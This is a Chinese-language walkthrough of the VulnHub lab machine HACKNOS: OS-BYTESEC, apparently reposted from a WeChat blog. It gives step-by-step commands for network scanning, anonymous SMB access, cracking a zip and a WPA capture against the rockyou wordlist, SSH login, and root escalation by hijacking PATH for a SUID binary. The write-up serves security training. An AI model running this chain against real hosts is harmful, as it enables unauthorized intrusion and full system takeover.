靶场实战|HACKNOS: OS-BYTESEC

https://www.vulnhub.com/entry/hacknos-os-bytesec,393/

攻击机：kali 192.168.11.143靶机：Linux，IP自动获取攻击机与靶机都使用net网络连接，在同一网段下

1、确定靶机IP

netdiscover -i eth0 -r 192.168.11.0/24

2、端口扫描

nmap -sV -Pn -sS 192.168.11.159

3、发现开放了80端口，访问试试看

在底部发现了一些信息：

尝试用类似账号密码的东西连接ssh，发现不正确

再看底部的get smb free，联想到开启了smb服务（还没碰到过Linux上开启smb服务的情况），考虑会不会是不需要密码就能访问smb服务。于是开始检测smb服务安全

4、使用nmap检测smb服务，未发现可利用的

nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.11.159

5、smbmap列出共享，发现两个共享都没有权限

kali自带，SMBMap允许用户枚举整个域中的samba共享驱动器。用户可以使用该工具列出共享驱动器、驱动器权限、共享内容、上传/下载功能、文件名自动下载模式匹配，甚至远程执行命令。

smbmap -H 192.168.11.159

6、enum4linux测试smb安全，发现确实可以匿名访问（无需用户名密码），并且发现账户smb

kali自带，该工具是enum.exe的Linux替代软件，用于枚举Windows和Samba主机中的数据

enum4linux -U 192.168.11.159还可以使用下面的命令全方位测试smb服务安全，枚举用户，共享文件enum4linux 192.168.11.159

7、smbclient访问目录，发现存在两个文件

smbclient命令属于samba套件，它提供一种命令行使用交互式方式访问samba服务器的共享资源。

smbclient  servername  [选项]smbclient //192.168.11.159/smb -U smb-U 指定用户servername 指定目标共享服务，这里是smb服务输入命令之后会提示要输入密码，这里可能是smb未授权访问，所以不需要提供密码，直接回车

8、将两个文件下载到当前文件夹下

get main.txt get safe.zip

发现main.txt文件中没什么信息，并且safe.zip压缩包有密码

9、fcrackzip破解zip文件，成功获得解压密码

kali自带，Fcrackzip是一款专门破解zip类型压缩文件密码的工具，工具小巧方便、破解速度快，能使用字典和指定字符集破解，适用于linux、mac osx 系统。

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip-D 表示使用字典破解-p 指定用于破解的字典  /usr/share/wordlists/  这个目录是kali里面放字典的目录，里面有各种类型的字典-u 指定要解密的压缩包

10、解压缩包得到一张图片和一个user.cap文件，图片没得到什么信息，用wireshark打开user.cap文件，发现是一些802.11协议的流量，使用工具aircrack-ng破解这个流量包

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a，802.11b，802.11g的数据。

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap-w 指定字典

显示KEY FOUND说明破解成功了（这里为 snowflake ）

11、使用账号密码：blackjax/snowflake连接ssh，发现成功连接

ssh -p 2525 blackjax@192.168.11.159

12、查看当前目录文件，发现user.txt，为普通用户下的flag

13、尝试提权，查看Linux内核版本，然后去漏洞库查找，找到一个貌似可以的

uname -a

14、将其下载编译，然后通过ssh上传到目标机器的 /tmp 目录下

scp -P 2525 /home/kali/target/Os-Bytesec/47196 blackjax@192.168.11.159:/tmp

15、运行exp发现提权失败，尝试其他提权方法，寻找有suid属性的文件，发现了一个可疑的文件 /usr/bin/netscan，因为里面有scan这样的词汇，可以多注意一下

find / -perm -u=s -type f 2>/dev/null

16、查看该文件，发现调用了 netstat -antp 命令，碰到这样的情况，可疑的文件拥有suid权限，又是可执行的，可以尝试接下来的操作进行提权

17、在/tmp目录下新建一个文件叫 netstat（与可疑文件调用的命令同名），内容为“/bin/bash”，添加执行权限，然后将目录添加进环境变量

cd /tmpecho "/bin/bash" > netstatchmod 775 netstatexport PATH=/tmp:$PATH

18、运行netscan，发现成功拿到root权限，最后拿到root权限下的flag

原文始发于微信公众号（simple学安全）：靶场实战|HACKNOS: OS-BYTESEC